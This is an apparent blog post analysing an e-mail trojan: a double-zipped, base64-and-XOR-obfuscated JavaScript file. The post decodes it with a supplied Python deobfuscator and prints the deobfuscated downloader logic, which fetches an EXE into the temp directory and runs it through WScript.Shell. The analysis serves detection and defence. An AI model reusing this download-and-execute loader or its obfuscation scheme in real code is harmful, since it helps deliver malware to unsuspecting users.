Recently I received two similar e-mails with attached trojans, both using encoded Javascript. In this post we look into how the Javascript is encoded and what it does when it is run.

The e-mail claimed that I had received a remittance and that I should open the attachment to claim my money. The attachment was a ZIP file named WU6533175781.zip, containing a ZIP file named file.zip, containing a Javascript file named invoice_Ir1vkp.js. The file is probably zipped twice to get past some antivirus software. Also, the Javascript is encoded:

var insensatePtK = decode('"AD4qHg9EOH0qJwgvWw=="');
var revelryk8e = decode('"Gj4RISoGYgs0AyUXY2Y="');
…
if (riledjg) {
    engageegd[toutfVe](wandervwY + Math.pow(2, 19));
}

As you can see, both the variable names and the string literals are obfuscated. The decode function is defined in the same file. It base64-decodes the string and XORs the result with a fixed, repeating key (the variable named cipher in the code). The code to base64-decode is copied literally from webtoolkit.info.

var decode = function (packedText) {
    var cipher ="WmIlf4LSyOmC766Y";  // XOR key; this value differed between the two e-mails
    …
    var text = Base64.decode(packedText);  // Base64 object copied from webtoolkit.info

    // XOR every character with the key, repeating the key as often as needed
    var cipherLength = cipher.length;
    var result = "";
    for (var i = 0; i < text.length; i++) {
        result += String.fromCharCode(text.charCodeAt(i) ^ cipher.charCodeAt(i % cipherLength));
    }
    return result;
};
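As an added example (not code from the original post or from the malware), here is a Python re-implementation of that decode() which pulls the key out of a script and rewrites every decode('"..."') call into its plaintext literal. The sample script is constructed from the cipher and the two encoded strings quoted above; the two regular expressions assume the exact `var cipher = "..."` and `decode('"..."')` spelling seen in this sample and would need adjusting for a differently structured variant.

```python
import base64
import re

# Constructed sample: the cipher and the two encoded strings quoted in the post,
# wrapped in just enough of the script's structure for the regexes to find them.
SAMPLE_SCRIPT = r'''
var decode = function (packedText) {
    var cipher ="WmIlf4LSyOmC766Y";
};
var insensatePtK = decode('"AD4qHg9EOH0qJwgvWw=="');
var revelryk8e = decode('"Gj4RISoGYgs0AyUXY2Y="');
'''

# Both patterns assume the spelling used in this sample (an assumption for any
# other campaign): a 'var cipher = "..."' assignment and decode('"..."') calls.
CIPHER_RE = re.compile(r'var\s+cipher\s*=\s*"([^"]+)"')
CALL_RE = re.compile(r"""decode\(\s*'"([A-Za-z0-9+/=]+)"'\s*\)""")

def decode_string(packed, key):
    """Reproduce the script's decode(): base64-decode, then XOR each byte
    with the repeating key. Assumes ASCII plaintext, as in this sample."""
    # The webtoolkit.info decoder drops every character outside the base64
    # alphabet, which is why the stray double quotes in the argument are harmless.
    raw = base64.b64decode(re.sub(r"[^A-Za-z0-9+/=]", "", packed))
    return "".join(chr(b ^ ord(key[i % len(key)])) for i, b in enumerate(raw))

def extract_key(script):
    """Pull the XOR key out of the unobfuscated decode() definition."""
    match = CIPHER_RE.search(script)
    if match is None:
        raise ValueError("no 'var cipher' assignment found in script")
    return match.group(1)

def deobfuscate(script):
    """Rewrite every decode('"..."') call as a plain string literal.
    Returns the rewritten script and a table of encoded -> decoded strings."""
    key = extract_key(script)
    table = {}

    def replace(match):
        plain = decode_string(match.group(1), key)
        table[match.group(1)] = plain
        escaped = plain.replace("\\", "\\\\").replace('"', '\\"')
        return '"' + escaped + '"'

    return CALL_RE.sub(replace, script), table

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_SCRIPT)[0])
```

Run on the sample, the two strings quoted above come out as "WScript.Shell" and "MSXML2.XMLHTTP", the COM object names that the renamed listing further down uses for the shell and the HTTP download.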

Now, what is interesting is that the two mails I received contained basically the same Javascript, encoded differently. So the structure and the decode function were the same, but the cipher, the string literals and the variable names differed. I assume this is to make it harder for virus scanners to detect this thing. It is remarkable, then, that the decode function itself is not obfuscated, so it would make an easy marker for recognizing this malware.

Because we have the decode function it is easy to decode all the strings in the script, and we can rename the variables to see what the code really does:

var wscriptShell = "WScript.Shell";
var shellObject = WScript.CreateObject(wscriptShell);
…
// try each download URL in turn until one returns a large enough payload
for (var i = 0; i < urls.length; i++) {
    try {
        var url = urls[i];
        httpObject.open(get, url, false);
        httpObject.send();
        if (httpObject.status == statusOk) {
            try {
                streamObject.open();
                streamObject.type = 1;  // binary stream
                streamObject.write(httpObject.responseBody);
                if (streamObject.size > minSize) {  // ignore error pages and empty responses
                    i = urls.length;  // leave the loop after the first usable download
                    streamObject.position = 0;
                    streamObject.saveToFile(exePath, 2);  // 2 = overwrite an existing file
                    success = true;
                }
            } finally {
                streamObject.close();
            }
        }
    } catch (ignored) {}  // a URL that fails is silently skipped
}
if (success) {
    shellObject[exec](tempDir + Math.pow(2, 19));  // runs the file named 524288 in the temp directory
}

Apparently it downloads an EXE into the temp directory and runs it, I assume to install the latest CryptoLocker variant. Normally in a web browser you can’t download things and run EXEs. However, this script is sent as an attachment and is meant to be run from disk, not from the internet: opening a .js file from disk hands it to the Windows Script Host instead of a browser, which is what gives it access to objects like WScript.Shell and the permission to do these things.

As you can see, it even takes extra effort to obfuscate the EXE filename, using the literal 524288 in one place and Math.pow(2, 19), which also evaluates to 524288, when actually running the file. It is a pretty simple piece of Javascript, encoded in a simple way. However, the encoding makes it possible to change the code for each spam campaign or perhaps even each e-mail, which makes it hard for signature-based virus scanners to block.